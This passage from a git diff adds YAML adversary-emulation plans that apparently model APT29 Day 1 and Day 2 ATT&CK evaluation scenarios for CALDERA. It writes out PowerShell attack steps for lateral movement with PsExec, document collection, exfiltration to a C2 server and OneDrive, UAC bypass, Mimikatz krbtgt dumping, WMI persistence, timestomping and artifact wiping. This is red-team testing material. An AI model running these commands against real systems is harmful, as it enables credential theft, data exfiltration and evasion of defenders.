95564347-e77a-4a89-b08f-dcafa5468f2c + name: Remote System Discovery (T1018) + description: Custom PowerShell script to perform AD triage for domain bound computers. + tactic: execution + technique: + attack_id: T1059.001 + name: "Command and Scripting Interpreter: PowerShell" + cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" + procedure_group: procedure_execution + procedure_step: "8.A.1" + platforms: + windows: + psh,pwsh: + command: | + if (! $(test-path -path "C:\Program Files\SysinternalsSuite")) { + write-host "[!] The path C:\Program Files\SysinternalsSuite does not exist. Execution has stopped."; + exit 1; + } + + Set-Location -path "C:\Program Files\SysinternalsSuite"; + . .\psversion.ps1; + Ad-Search Computer Name *; + + executors: + - name: powershell + command: | + if (! $(test-path -path "C:\Program Files\SysinternalsSuite")) { + write-host "[!] The path C:\Program Files\SysinternalsSuite does not exist. Execution has stopped."; + exit 1; + } + + Set-Location -path "C:\Program Files\SysinternalsSuite"; + . .\psversion.ps1; + Ad-Search Computer Name *; + +- id: c4a59e39-53b0-4ace-9528-8ff052752ece + name: Identifying current user on other machines + description: Custom PowerShell script to perform AD triage for domain bound computers. + tactic: execution + technique: + attack_id: T1059.001 + name: "Command and Scripting Interpreter: PowerShell" + cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" + procedure_group: procedure_execution + procedure_step: "8.A.2" + platforms: + windows: + psh: + command: | + Invoke-Command -ComputerName "$(hostname)" -ScriptBlock { Get-Process -IncludeUserName | Select-Object UserName,SessionId | Where-Object { $_.UserName -like "*\$env:USERNAME" } | Sort-Object SessionId -Unique } | Select-Object UserName,SessionId -Last 1; + + executors: + - name: powershell + command: | + Invoke-Command -ComputerName "$(hostname)" -ScriptBlock { Get-Process -IncludeUserName | Select-Object UserName,SessionId | Where-Object { $_.UserName -like "*\$env:USERNAME" } | Sort-Object SessionId -Unique } | Select-Object UserName,SessionId -Last 1; + +- id: bddc0abc-07a0-41b7-813f-e0c64d9226b3 + name: Copy Sandcat File + description: Copy Sandcat file using PsExec + tactic: lateral-movement + technique: + attack_id: T1105 + name: "Ingress Tool Transfer" + cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" + procedure_group: procedure_lat_movement + procedure_step: "8.B" + platforms: + windows: + psh,pwsh: + command: | + move-item sandcat.go-windows-upx C:\Windows\temp\python.exe -force; + set-location "C:\Program Files\SysinternalsSuite\"; + .\PsExec64.exe -accepteula \\#{pivot_machine_hostname} -i #{user.session.id} -d -f -c "C:\Windows\Temp\python.exe" -group "day-1-lateral-movement" -server "#{server}"; + tasklist /S #{pivot_machine_hostname} /FI "IMAGENAME eq python.exe"; + payloads: + - sandcat.go-windows-upx + + input_arguments: + pivot_machine_hostname: + description: Hostname of pivot machine + type: string + default: pivothost + + user.session.id: + description: Session id for user + type: string + default: "1" + + server: + description: IP or Hostname of server + type: string + default: 192.0.2.10 + + executors: + - name: powershell + command: | + +- id: 00446217-53ca-4749-bacd-f41fe189d36e + name: Startup Folder Persistence Execution + description: Sets credentials for a headless RDP session to spawn triggering startup folder persistence. + tactic: lateral-movement + technique: + attack_id: T1037.005 + name: "Boot or Logon Initialization Scripts: Startup Items" + cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" + procedure_group: procedure_lat_movement + procedure_step: "10.B" + platforms: + windows: + psh,pwsh: + command: | + cmdkey /add:127.0.0.2 /user:#{profile_user} /pass:#{profile_user_password}; + mstsc /v:127.0.0.2; + sleep 10; + Get-Process -name mstsc; + if ($?) { taskkill.exe /F /IM mstsc.exe; exit 0; } else {exit 1;} + + input_arguments: + profile_user: + description: Name of profile user + type: string + default: Administrator + + profile_user_password: + description: Password of profile user + type: string + default: Password123! + + executors: + - name: powershell + command: | + cmdkey /add:127.0.0.2 /user:#{profile_user} /pass:#{profile_user_password}; + mstsc /v:127.0.0.2; + sleep 10; + Get-Process -name mstsc; + if ($?) { taskkill.exe /F /IM mstsc.exe; exit 0; } else {exit 1;} + +- id: 4bedbd9b-a570-4f9f-b78a-2f7f99ad5e92 + name: Artifact Cleanup + description: Delete file artifacts left from the operation. + tactic: defensive-evasion + technique: + attack_id: T1070.004 + name: "Indicator Removal on Host: File Deletion" + cti_source: "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=6ab66701-25d7-4685-ae9d-93d63708a11c&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments" + procedure_group: procedure_def_evasion + procedure_step: "10.A.3" + platforms: + windows: + psh,pwsh: + command: | + Remove-Item -Path "$env:USERPROFILE\Downloads\*.pfx" -Force; + Remove-Item -Path "$env:USERPROFILE\Downloads\*.bmp" -Force; + Remove-Item -Path "$env:USERPROFILE\Downloads\*.png" -Force; + if (test-path -path "$env:APPDATA\OfficeSupplies.7z") { + Remove-Item -Path "$env:APPDATA\OfficeSupplies.7z" -Force; write-host "[+] Successfully removed OfficeSupplies.7z"; + } else { + write-host "[!] File did not exist to be removed!"; + } + + if (get-job -name "Keystrokes" -ErrorAction SilentlyContinue) { + Remove-Job -Name "Keystrokes"; + if ($?) { + write-host "[+] Job \"Keystrokes\" was remove."; + } + } else { + write-host "[!] Job \"Keystrokes\" did not exist."; + } + + if (get-job -Name "Screenshot" -ErrorAction SilentlyContinue) { + Remove-Job -Name "Screenshot" -Force; + write-host "[+] Job \"screenshot\" was removed."; + } else { + write-host "[*] Job \"screenshot\" does not exist, thus was not removed."; + } + remove-item upload.ps1 -Force; + + executors: + - name: powershell + command: | + Remove-Item -Path "$env:USERPROFILE\Downloads\*.pfx" -Force; + Remove-Item -Path "$env:USERPROFILE\Downloads\*.bmp" -Force; + Remove-Item -Path "$env:USERPROFILE\Downloads\*.png" -Force; + if (test-path -path "$env:APPDATA\OfficeSupplies.7z") { + Remove-Item -Path "$env:APPDATA\OfficeSupplies.7z" -Force; write-host "[+] Successfully removed OfficeSupplies.7z"; + } else { + write-host "[!] File did not exist to be removed!"; + } + + if (get-job -name "Keystrokes" -ErrorAction SilentlyContinue) { + Remove-Job -Name "Keystrokes"; + if ($?) { + write-host "[+] Job \"Keystrokes\" was remove."; + } + } else { + write-host "[!] Job \"Keystrokes\" did not exist."; + } + + if (get-job -Name "Screenshot" -ErrorAction SilentlyContinue) { + Remove-Job -Name "Screenshot" -Force; + write-host "[+] Job \"screenshot\" was removed."; + } else { + write-host "[*] Job \"screenshot\" does not exist, thus was not removed."; + } + remove-item upload.ps1 -Force; + +# Step 10 - Persistence Execution + +- id: 4b2e9574-b1a7-4b38-95b2-6054ded9c4fe + name: Scheduled Task + description: Reboot the machine to aid in peristence callbacks + tactic: impact + technique: + attack_id: T1529 + name: "System Shutdown/Reboot" + cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" + procedure_group: procedure_impact + procedure_step: "10.A" + platforms: + windows: + psh,pwsh: + command: | + write-host "[*] Restarting Computer"; + Restart-Computer -Force; + + executors: + - name: powershell + command: | + write-host "[*] Restarting Computer"; + Restart-Computer -Force; diff --git a/apt29/Emulation_Plan/yaml/APT29-Day1.B.yaml b/apt29/Emulation_Plan/yaml/APT29-Day1.B.yaml new file mode 100644 index 00000000..62018f61 --- /dev/null +++ b/apt29/Emulation_Plan/yaml/APT29-Day1.B.yaml @@ -0,0 +1,132 @@ +# APT29-Day1.B.yaml - CALDERA and Atomic style TTPs + +- emulation_plan_details: + id: 7d264eae-7d49-4d89-96cd-df6b60914a6c + adversary_name: APT29 Day 1.B + adversary_description: APT29 is a threat group that has been attributed to the Russian government who have been in operation since at least 2008. This group reportedly compromised the Democratic National Committee starting in the summer of 2015. This adversary models scenario Day 1.B of the APT29. + attack_version: 8.1 + format_version: 1.0 + +- id: 08e57385-dbce-4850-8bb7-589ef79465ab + name: Automated document collection (T1119) + description: Execute PowerShell collection command to collect and compress files of specific extensions. + tactic: execution + technique: + attack_id: T1059.001 + name: "Command and Scripting Interpreter: PowerShell" + cti_source: "https://www.fireeye.com/blog/products-and-services/2019/02/state-of-the-hack-no-easy-breach-revisited.html" + procedure_group: procedure_execution + procedure_step: "9.B.1" + platforms: + windows: + psh,pwsh: + command: | + move-item Rar.exe -Destination C:\Windows\Temp -Force; + $env:APPDATA;$files=ChildItem -Path $env:USERPROFILE\ -Include *.doc,*.xps,*.xls,*.ppt,*.pps,*.wps,*.wpd,*.ods,*.odt,*.lwp,*.jtd,*.pdf,*.zip,*.rar,*.docx,*.url,*.xlsx,*.pptx,*.ppsx,*.pst,*.ost,*psw*,*pass*,*login*,*admin*,*sifr*,*sifer*,*vpn,*.jpg,*.txt,*.lnk -Recurse -ErrorAction SilentlyContinue | Select -ExpandProperty FullName; Compress-Archive -LiteralPath $files -CompressionLevel Optimal -DestinationPath $env:APPDATA\working.zip -Force; + cd C:\Windows\Temp; + .\Rar.exe a -hpfGzq5yKw "$env:USERPROFILE\Desktop\working.zip" "$env:APPDATA\working.zip"; + payloads: + - rar.exe + + executors: + - name: powershell + command: | + move-item Rar.exe -Destination C:\Windows\Temp -Force; + $env:APPDATA;$files=ChildItem -Path $env:USERPROFILE\ -Include *.doc,*.xps,*.xls,*.ppt,*.pps,*.wps,*.wpd,*.ods,*.odt,*.lwp,*.jtd,*.pdf,*.zip,*.rar,*.docx,*.url,*.xlsx,*.pptx,*.ppsx,*.pst,*.ost,*psw*,*pass*,*login*,*admin*,*sifr*,*sifer*,*vpn,*.jpg,*.txt,*.lnk -Recurse -ErrorAction SilentlyContinue | Select -ExpandProperty FullName; Compress-Archive -LiteralPath $files -CompressionLevel Optimal -DestinationPath $env:APPDATA\working.zip -Force; + cd C:\Windows\Temp; + .\Rar.exe a -hpfGzq5yKw "$env:USERPROFILE\Desktop\working.zip" "$env:APPDATA\working.zip"; + +- id: 2d18c8ec-4593-49dc-9bf4-11d0673d6ae6 + name: Data from staged file (T1074) and Exfiltration over C2 Channel (T1041) + description: Copy a target file from a remote file share through the existing C2 channel + tactic: exfiltration + technique: + attack_id: T1041 + name: "Exfiltration Over C2 Channel" + cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" + procedure_group: procedure_exfiltration + procedure_step: "9.B.8" + platforms: + windows: + psh,pwsh: + command: | + Import-Module .\upload.ps1 -Verbose -Force; + Invoke-MultipartFormDataUpload -InFile "C:\Users\#{profile_user}\Desktop\working.zip" -Uri "#{server}/file/upload"; + cleanup: | + remove-item upload.ps1 -Force + payloads: + - upload.ps1 + + input_arguments: + profile_user: + description: Name of profile user + type: string + default: Administrator + + server: + description: IP or Hostname of server + type: string + default: 192.0.2.10 + + executors: + - name: powershell + command: | + Import-Module .\upload.ps1 -Verbose -Force; + Invoke-MultipartFormDataUpload -InFile "C:\Users\#{profile_user}\Desktop\working.zip" -Uri "#{server}/file/upload"; + cleanup_command: | + remove-item upload.ps1 -Force + +- id: 208b021b-c79a-4176-8ad1-3af99ed50c6f + name: Artifact Cleanup - Delete Staged Files + description: Cleanup files related to Operation + tactic: defensive-evasion + technique: + attack_id: T1070.004 + name: "Indicator Removal on Host: File Deletion" + cti_source: "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=6ab66701-25d7-4685-ae9d-93d63708a11c&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments" + procedure_group: procedure_def_evasion + procedure_step: "9.C" + platforms: + windows: + psh,pwsh: + command: | + if (!$(test-path -path "C:\Program Files\SysInternalsSuite")) { + mkdir "C:\Program Files\SysInternalsSuite"; + } + set-location "C:\Program Files\SysInternalsSuite"; + + if (!$(test-path -path "sdelete64.exe")) { + iwr -uri "https://download.sysinternals.com/files/SDelete.zip" -outfile sdelete64.zip; + Expand-Archive sdelete64.zip -force; + } + copy sdelete64.exe C:\Windows\Temp\; + cd C:\Windows\Temp\ ; + .\sdelete64.exe /accepteula C:\Windows\Temp\Rar.exe; + .\sdelete64.exe /accepteula C:\Users\#{profile_user}\AppData\Roaming\working.zip; + .\sdelete64.exe /accepteula C:\Users\#{profile_user}\Desktop\working.zip; + remove-item C:\Windows\Temp\sdelete64.exe -force; + + input_arguments: + profile_user: + description: Name of profile user + type: string + default: Administrator + + executors: + - name: powershell + command: | + if (!$(test-path -path "C:\Program Files\SysInternalsSuite")) { + mkdir "C:\Program Files\SysInternalsSuite"; + } + set-location "C:\Program Files\SysInternalsSuite"; + + if (!$(test-path -path "sdelete64.exe")) { + iwr -uri "https://download.sysinternals.com/files/SDelete.zip" -outfile sdelete64.zip; + Expand-Archive sdelete64.zip -force; + } + copy sdelete64.exe C:\Windows\Temp\; + cd C:\Windows\Temp\ ; + .\sdelete64.exe /accepteula C:\Windows\Temp\Rar.exe; + .\sdelete64.exe /accepteula C:\Users\#{profile_user}\AppData\Roaming\working.zip; + .\sdelete64.exe /accepteula C:\Users\#{profile_user}\Desktop\working.zip; + remove-item C:\Windows\Temp\sdelete64.exe -force; diff --git a/apt29/Emulation_Plan/yaml/APT29-Day2.yaml b/apt29/Emulation_Plan/yaml/APT29-Day2.yaml new file mode 100644 index 00000000..b8d1d2a4 --- /dev/null +++ b/apt29/Emulation_Plan/yaml/APT29-Day2.yaml @@ -0,0 +1,758 @@ +# APT29-Day2.yaml - CALDERA and Atomic style TTPs + +- emulation_plan_details: + id: 4aafe2ab-1c03-4ac1-aaa3-fdd69c305a0a + adversary_name: APT29 Day 2 + adversary_description: APT29 is a threat group that has been attributed to the Russian government who have been in operation since at least 2008. This group reportedly compromised the Democratic National Committee starting in the summer of 2015. This adversary models scenario Day 2 of the APT29. + attack_version: 8.1 + format_version: 1.0 + +# Step 11 - Initial Breach + +# .lnk payload +- id: e506f811-884d-4992-aacb-514b33a0324f + name: Click .LNK payload + description: Execute PowerShell collection command to collect and compress files of specific extensions. + tactic: execution + technique: + attack_id: T1204.002 + name: "User Execution: Malicious File" + cti_source: "https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html" + procedure_group: procedure_execution + procedure_step: "11.A" + platforms: + windows: + psh,pwsh: + command: | + Set-Location -Path "C:\Users\#{profile_user_day2}\Desktop"; + + if(Test-Path -LiteralPath "$env:appdata\Microsoft\kxwn.lock"){ + Remove-Item "$env:appdata\Microsoft\kxwn.lock" -Force; + Write-Host "Removed old kxwn.lock file"; + } + + powershell.exe Get-Content '.\2016_United_States_presidential_election_-_Wikipedia.html' -Stream schemas | IEX; + cleanup: | + Remove-Item "$env:appdata\Microsoft\kxwn.lock" -Force; + + input_arguments: + profile_user_day2: + description: Name of profile user + type: string + default: Administrator + + executors: + - name: powershell + command: | + Set-Location -Path "C:\Users\#{profile_user_day2}\Desktop"; + + if(Test-Path -LiteralPath "$env:appdata\Microsoft\kxwn.lock"){ + Remove-Item "$env:appdata\Microsoft\kxwn.lock" -Force; + Write-Host "Removed old kxwn.lock file"; + } + + powershell.exe Get-Content '.\2016_United_States_presidential_election_-_Wikipedia.html' -Stream schemas | IEX; + cleanup_command: | + Remove-Item "$env:appdata\Microsoft\kxwn.lock" -Force; + +# Step 12 - Fortify Access + +- id: 4a2ad84e-a93a-4b2e-b1f0-c354d6a41278 + name: Timestomp kxwn.lock + description: Timestomp kxwn.lock + tactic: defensive-evasion + technique: + attack_id: T1070.006 + name: "Indicator Removal on Host: Timestomp" + cti_source: "https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html" + procedure_group: procedure_def_evasion + procedure_step: "12.A" + platforms: + windows: + psh,pwsh: + command: | + if (!(test-path -path "$env:appdata\Microsoft\kxwn.lock")) { + write-host "[!] kxwn.lock was not found on this host."; + exit 1; + } else { + . .\timestomp.ps1; + timestomp -dest "$env:appdata\Microsoft\kxwn.lock"; + } + payloads: + - timestomp.ps1 + + executors: + - name: powershell + command: | + if (!(test-path -path "$env:appdata\Microsoft\kxwn.lock")) { + write-host "[!] kxwn.lock was not found on this host."; + exit 1; + } else { + . .\timestomp.ps1; + timestomp -dest "$env:appdata\Microsoft\kxwn.lock"; + } + +- id: f9c0b150-822f-497b-ad6d-187f24561e9a + name: Detect Anti-Virus + description: Detect anti-virus software on host + tactic: discovery + technique: + attack_id: T1518.001 + name: "Software Discovery: Security Software Discovery" + cti_source: "https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html" + procedure_group: procedure_discovery + procedure_step: "12.B" + platforms: + windows: + psh,pwsh: + command: | + . .\stepTwelve.ps1; + detectav + payloads: + - stepTwelve.ps1 + + executors: + - name: powershell + command: | + . .\stepTwelve.ps1; + detectav + +- id: 2b5a72b1-01e4-48ae-98b0-2570a7894371 + name: Detect Software + description: Detect software on host + tactic: discovery + technique: + attack_id: T1518 + name: "Software Discovery" + cti_source: "https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html" + procedure_group: procedure_discovery + procedure_step: "12.C" + platforms: + windows: + psh,pwsh: + command: | + . .\stepTwelve.ps1; + software; + payloads: + - stepTwelve.ps1 + + executors: + - name: powershell + command: | + . .\stepTwelve.ps1; + software; + +# Step 13 - Local Enumaration + +- id: 0cfadbcb-ec21-44ae-adb7-9a23176dd620 + name: Enumerate Computer Name + description: Triage host for ComputerNameNetBIOS,ComputerNameDnsHostname,ComputerNameDnsDomain,ComputerNameDnsFullyQualified,ComputerNamePhysicalNetBIOS,ComputerNamePhysicalDnsHostname,ComputerNamePhysicalDnsDomain,ComputerNamePhysical,DnsFullyQualifie + tactic: discovery + technique: + attack_id: T1082 + name: "System Information Discovery" + cti_source: "https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/" + procedure_group: procedure_discovery + procedure_step: "13.A" + platforms: + windows: + psh,pwsh: + command: | + . .\stepThirteen.ps1; + comp; + payloads: + - stepThirteen.ps1 + + executors: + - name: powershell + command: | + . .\stepThirteen.ps1; + comp; + +- id: 96140694-6d13-40b6-9553-0e63533469f3 + name: Enumerate Domain Name + description: Domain triage + tactic: discovery + technique: + attack_id: T1082 + name: "System Information Discovery" + cti_source: "https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/" + procedure_group: procedure_discovery + procedure_step: "13.B" + platforms: + windows: + psh,pwsh: + command: | + . .\stepThirteen.ps1; + domain; + payloads: + - stepThirteen.ps1 + + executors: + - name: powershell + command: | + . .\stepThirteen.ps1; + domain; + +- id: f320eebd-e75b-4194-b529-79e64ad0b9ee + name: Enumerate Username + description: user triage + tactic: discovery + technique: + attack_id: T1033 + name: "System Owner/User Discovery" + cti_source: "https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/" + procedure_group: procedure_discovery + procedure_step: "13.C" + platforms: + windows: + psh,pwsh: + command: | + . .\stepThirteen.ps1; + user; + payloads: + - stepThirteen.ps1 + + executors: + - name: powershell + command: | + . .\stepThirteen.ps1; + user; + +- id: a34ab8f2-a106-41fb-af0b-cf5382bd18ae + name: Enumerate Processes + description: Process triage + tactic: discovery + technique: + attack_id: T1057 + name: "Process Discovery" + cti_source: "https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/" + procedure_group: procedure_discovery + procedure_step: "13.D" + platforms: + windows: + psh,pwsh: + command: | + . .\stepThirteen.ps1; + pslist; + payloads: + - stepThirteen.ps1 + + executors: + - name: powershell + command: | + . .\stepThirteen.ps1; + pslist; + +# Step 14 - Elevation + +- id: 5226e5dc-fc28-43b7-a679-0db49d520402 + name: UAC Bypass via sdctl + description: Invoke UAC bypass sdctl + tactic: defensive-evasion + technique: + attack_id: T1134.002 + name: "Access Token Manipulation: Create Process with Token" + cti_source: "https://www.slideshare.net/MatthewDunwoody1/no-easy-breach-derby-con-2016" + procedure_group: procedure_def_evasion + procedure_step: "14.A" + platforms: + windows: + psh,pwsh: + command: | + . .\stepFourteen_bypassUAC.ps1; + bypass; + payloads: + - stepFourteen_bypassUAC.ps1 + + executors: + - name: powershell + command: | + . .\stepFourteen_bypassUAC.ps1; + bypass; + +- id: 1dba454c-0e4f-4fe0-8bc9-b17e8c5c9a24 + name: Stage Mimikatz Binary + description: Staging Mimikatz Binary for later execution + tactic: credential-access + technique: + attack_id: T1003 + name: "Credential Dumping" + cti_source: "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/" + procedure_group: procedure_cred_access + procedure_step: "14.C" + platforms: + windows: + psh,pwsh: + command: | + write-host "[+] Successfully downloaded m.exe"; + payloads: + - m.exe + + executors: + - name: powershell + command: | + write-host "[+] Successfully downloaded m.exe"; + +- id: 4ef6009d-2d62-4bb4-8de9-0458df2e9567 + name: Credential Dumping + description: Dumping credentials via wmidump (Mimikatz) + tactic: credential-access + technique: + attack_id: T1003 + name: "Credential Dumping" + cti_source: "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/" + procedure_group: procedure_cred_access + procedure_step: "14.B" + platforms: + windows: + psh,pwsh: + command: | + . .\stepFourteen_credDump.ps1; + wmidump; + payloads: + - stepFourteen_credDump.ps1 + + executors: + - name: powershell + command: | + . .\stepFourteen_credDump.ps1; + wmidump; + +# Step 15 - Establish Persistence + +- id: 43aad2d6-d16a-4adb-aa2b-9510a3be4c52 + name: WMI Persistence technique + description: user triage + tactic: persistence + technique: + attack_id: T1546.003 + name: "Event Triggered Execution: Windows Management Instrumentation Event Subscription" + cti_source: "https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html" + procedure_group: procedure_persistence + procedure_step: "15.A" + platforms: + windows: + psh,pwsh: + command: | + Get-WmiObject -Namespace "root/subscription" -list | findstr /i "__Filter"; + if ($?) { + write-host "[*] WMI script has already executed on this machine. Not loading and executing wmi script."; + exit 1; + } else { + . .\stepFifteen_wmi.ps1; + wmi; + if ($?) { + write-host "[+] WMI script has successfully executed!"; + exit 0; + } + exit 1; + } + payloads: + - stepFifteen_wmi.ps1 + + executors: + - name: powershell + command: | + Get-WmiObject -Namespace "root/subscription" -list | findstr /i "__Filter"; + if ($?) { + write-host "[*] WMI script has already executed on this machine. Not loading and executing wmi script."; + exit 1; + } else { + . .\stepFifteen_wmi.ps1; + wmi; + if ($?) { + write-host "[+] WMI script has successfully executed!"; + exit 0; + } + exit 1; + } + +# Step 16 - Lateral Movement + +- id: 1c8552c7-f7ed-4523-b640-72d65af5f855 + name: Enumerate Domain Controller + description: Get domain controller and current user SID for the domain + tactic: discovery + technique: + attack_id: T1018 + name: "Remote System Discovery" + cti_source: "https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/" + procedure_group: procedure_discovery + procedure_step: "16.A" + platforms: + windows: + psh,pwsh: + command: | + . .\powerview.ps1; + get-netdomaincontroller; + payloads: + - powerview.ps1 + + executors: + - name: powershell + command: | + . .\powerview.ps1; + get-netdomaincontroller; + +- id: a42be479-fc26-4d7c-9e63-7a9b74e4c8d2 + name: Enumerate Domain SID + description: Get domain user SID + tactic: discovery + technique: + attack_id: T1033 + name: "System Owner/User Discovery" + cti_source: "https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/" + procedure_group: procedure_discovery + procedure_step: "16.B" + platforms: + windows: + psh,pwsh: + command: | + . .\stepSixteen_SID.ps1; + siduser; + payloads: + - stepSixteen_SID.ps1 + + executors: + - name: powershell + command: | + . .\stepSixteen_SID.ps1; + siduser; + +- id: acecc8f7-18c2-41fd-87bc-39ffd644e4e9 + name: Remote Connection (T1028) & Remote File Copy (T1105) & Credential Dumping + description: Establish connection to Domain Controller + tactic: lateral-movement + technique: + attack_id: T1105 + name: "Ingress Tool Transfer" + cti_source: "https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/" + procedure_group: procedure_lat_movement + procedure_step: "16.C-16.D" + platforms: + windows: + psh,pwsh: + command: | + . .\invoke-winrmsession.ps1; + $session = invoke-winrmsession -Username "#{target.winrm.username}" -Password "#{target.winrm.password}" -IPAddress "#{target.winrm.remote_host}"; + Copy-Item m.exe -Destination "C:\Windows\System32\\" -ToSession $session -force; + if ($?) { + write-host "[+] Successfully copied m.exe to remote host"; + } else { + write-host "[!] Error, copying and executing m.exe on remote host"; + } + Invoke-Command -Session $session -scriptblock {C:\Windows\System32\m.exe privilege::debug "lsadump::lsa /inject /name:krbtgt" exit} | out-string + + payloads: + - invoke-winrmsession.ps1 + - m.exe + + input_arguments: + target.winrm.username: + description: Username of winrm target + type: string + default: Administrator + + target.winrm.password: + description: Password for winrm target user + type: string + default: Password123! + + target.winrm.remote_host: + description: IP or Hostname of remote host + type: string + default: 192.0.2.20 + + executors: + - name: powershell + command: | + . .\invoke-winrmsession.ps1; + $session = invoke-winrmsession -Username "#{target.winrm.username}" -Password "#{target.winrm.password}" -IPAddress "#{target.winrm.remote_host}"; + Copy-Item m.exe -Destination "C:\Windows\System32\\" -ToSession $session -force; + if ($?) { + write-host "[+] Successfully copied m.exe to remote host"; + } else { + write-host "[!] Error, copying and executing m.exe on remote host"; + } + Invoke-Command -Session $session -scriptblock {C:\Windows\System32\m.exe privilege::debug "lsadump::lsa /inject /name:krbtgt" exit} | out-string + +# Step 17 - Collection + +- id: b1dcc53a-c86c-46ba-8a3d-e1da74a8db3c + name: Collect E-mails + description: Perform e-mail collection from custom PowerShell module. + tactic: collection + technique: + attack_id: T1114.001 + name: "Email Collection: Local Email Collection" + cti_source: "https://www.fireeye.com/blog/products-and-services/2019/02/state-of-the-hack-no-easy-breach-revisited.html" + procedure_group: procedure_collection + procedure_step: "17.A" + platforms: + windows: + psh,pwsh: + command: | + . .\stepSeventeen_email.ps1; + Write-Host "Emails Collected"; + payloads: + - stepSeventeen_email.ps1 + + executors: + - name: powershell + command: | + . .\stepSeventeen_email.ps1; + Write-Host "Emails Collected"; + +- id: fc231955-774f-442c-ac0e-e74dfda50c5c + name: Collect Files & Compress Collection + description: Collect a specific document from a target machine. + tactic: collection + technique: + attack_id: T1005 + name: "Data from Local System" + cti_source: "https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html" + procedure_group: procedure_collection + procedure_step: "17.B-17.C" + platforms: + windows: + psh,pwsh: + command: | + try{ + if (!(test-path -path "C:\Windows\Temp\WindowsParentalControlMigration" -ErrorAction Stop)) { + New-Item -Path "C:\Windows\temp\" -Name "WindowsParentalControlMigration" -ItemType "directory" -force; + } + } catch { + write-host "[!] Access is denied. Manually browse to C:\Windows\Temp via Explorer and accept prompt"; + exit 1; + } + + if (! (test-path -path "C:\Users\#{profile_user_day2}\Documents\MITRE-ATTACK-EVALS.HTML")) { + write-host "[!] Error, MITRE-ATTACK-EVALS.HTML was not found."; + exit 1; + } + Copy-Item "C:\Users\#{profile_user_day2}\Documents\MITRE-ATTACK-EVALS.HTML" -Destination "C:\Windows\Temp\WindowsParentalControlMigration" -force; + . .\stepSeventeen_zip.ps1; + zip C:\Windows\Temp\WindowsParentalControlMigration.tmp C:\Windows\Temp\WindowsParentalControlMigration; + if ($?) { + write-host "[+] Documents successfully staged for collection."; + } + + payloads: + - stepSeventeen_zip.ps1 + + input_arguments: + profile_user_day2: + description: Name of profile user + type: string + default: Administrator + + executors: + - name: powershell + command: | + try{ + if (!(test-path -path "C:\Windows\Temp\WindowsParentalControlMigration" -ErrorAction Stop)) { + New-Item -Path "C:\Windows\temp\" -Name "WindowsParentalControlMigration" -ItemType "directory" -force; + } + } catch { + write-host "[!] Access is denied. Manually browse to C:\Windows\Temp via Explorer and accept prompt"; + exit 1; + } + + if (! (test-path -path "C:\Users\#{profile_user_day2}\Documents\MITRE-ATTACK-EVALS.HTML")) { + write-host "[!] Error, MITRE-ATTACK-EVALS.HTML was not found."; + exit 1; + } + Copy-Item "C:\Users\#{profile_user_day2}\Documents\MITRE-ATTACK-EVALS.HTML" -Destination "C:\Windows\Temp\WindowsParentalControlMigration" -force; + . .\stepSeventeen_zip.ps1; + zip C:\Windows\Temp\WindowsParentalControlMigration.tmp C:\Windows\Temp\WindowsParentalControlMigration; + if ($?) { + write-host "[+] Documents successfully staged for collection."; + } + +# Step 18 - Exfiltration + +- id: 4840d6dd-da13-401a-be46-05db56f4e1e0 + name: Exfiltrate data to OneDrive + description: Transfer data to a OneDrive account + tactic: exfiltration + technique: + attack_id: T1537 + name: "Transfer Data to Cloud Account" + cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" + procedure_group: procedure_exfiltration + procedure_step: "18.A" + platforms: + windows: + psh,pwsh: + command: | + $err = $(net use y: #{onedrive.url} /user:#{onedrive.username} "#{onedrive.password}" 2>&1); + if($err -Like "*System error 85*") { + Write-Host "OneDrive net drive is already mounted!"; + } elseif($err -Like "*System error 67*") { + Write-Host "OneDrive net drive mount failed - Check URL!"; + Write-Host "#{onedrive.url}"; + exit 1; + } elseif($err -Like "*System error 1244*") { + Write-Host "Could not authenticate to OneDrive - Check Creds!"; + Write-Host "User: #{onedrive.username}"; + Write-Host "Password: #{onedrive.password}"; + exit 1; + } + + Write-Host "Mount Successful" + Copy-Item "C:\Windows\Temp\WindowsParentalControlMigration.tmp" -Destination "y:\WindowsParentalControlMigration.tmp" -Force; + if(!$?){ + exit 1; + } + + Write-Host "Copy Successfull" + exit 0; + + input_arguments: + onedrive.url: + description: URL for 